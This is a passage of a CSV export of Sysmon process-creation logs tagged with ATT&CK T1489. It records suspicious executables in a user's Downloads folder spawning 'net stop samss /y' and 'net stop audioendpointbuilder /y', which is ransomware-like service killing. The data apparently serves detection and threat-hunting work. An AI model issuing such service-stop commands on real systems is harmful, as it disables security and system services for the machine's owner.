stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1afd-5ec9-0000-0010d00f1f00}"",""parentProcessId"":""211964"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:50.700",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.176 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00} +ProcessId: 211964 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.183538700Z"",""eventRecordID"":""1712"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.176\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010d00f1f00}\r\nProcessId: 211964\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.176"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-0010d00f1f00}"",""processId"":""211964"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:50.685",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:49.114 +ProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010ce0b1f00} +ProcessId: 211940 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00} +ParentProcessId: 211896 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:49.119469400Z"",""eventRecordID"":""1711"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:49.114\r\nProcessGuid: {df9fc3d3-1afd-5ec9-0000-0010ce0b1f00}\r\nProcessId: 211940\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00}\r\nParentProcessId: 211896\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:49.114"",""processGuid"":""{df9fc3d3-1afd-5ec9-0000-0010ce0b1f00}"",""processId"":""211940"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1afc-5ec9-0000-001029031f00}"",""parentProcessId"":""211896"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:50.658",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:48.948 +ProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00} +ProcessId: 211896 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:48.964626100Z"",""eventRecordID"":""1710"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:48.948\r\nProcessGuid: {df9fc3d3-1afc-5ec9-0000-001029031f00}\r\nProcessId: 211896\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:48.948"",""processGuid"":""{df9fc3d3-1afc-5ec9-0000-001029031f00}"",""processId"":""211896"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:45:41.028",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.609 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010802d1d00} +ProcessId: 207800 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00} +ParentProcessId: 207656 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.619371400Z"",""eventRecordID"":""1709"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.609\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010802d1d00}\r\nProcessId: 207800\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00}\r\nParentProcessId: 207656\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.609"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010802d1d00}"",""processId"":""207800"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 
stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1af3-5ec9-0000-0010bd261d00}"",""parentProcessId"":""207656"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:45:41.014",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.500 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00} +ProcessId: 207656 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.508668300Z"",""eventRecordID"":""1708"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.500\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010bd261d00}\r\nProcessId: 207656\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.500"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010bd261d00}"",""processId"":""207656"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:45:40.996",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.433 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010ad201d00} +ProcessId: 207632 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00} +ParentProcessId: 207540 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:45:39.440236600Z"",""eventRecordID"":""1707"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:45:39.433\r\nProcessGuid: {df9fc3d3-1af3-5ec9-0000-0010ad201d00}\r\nProcessId: 207632\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00}\r\nParentProcessId: 207540\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:45:39.433"",""processGuid"":""{df9fc3d3-1af3-5ec9-0000-0010ad201d00}"",""processId"":""207632"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1af3-5ec9-0000-001049181d00}"",""parentProcessId"":""207540"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:45:40.982",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:45:39.287 +ProcessGuid: {df9fc3d3-1af3-5ec9-0000-001049181d00} +ProcessId: 207540 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
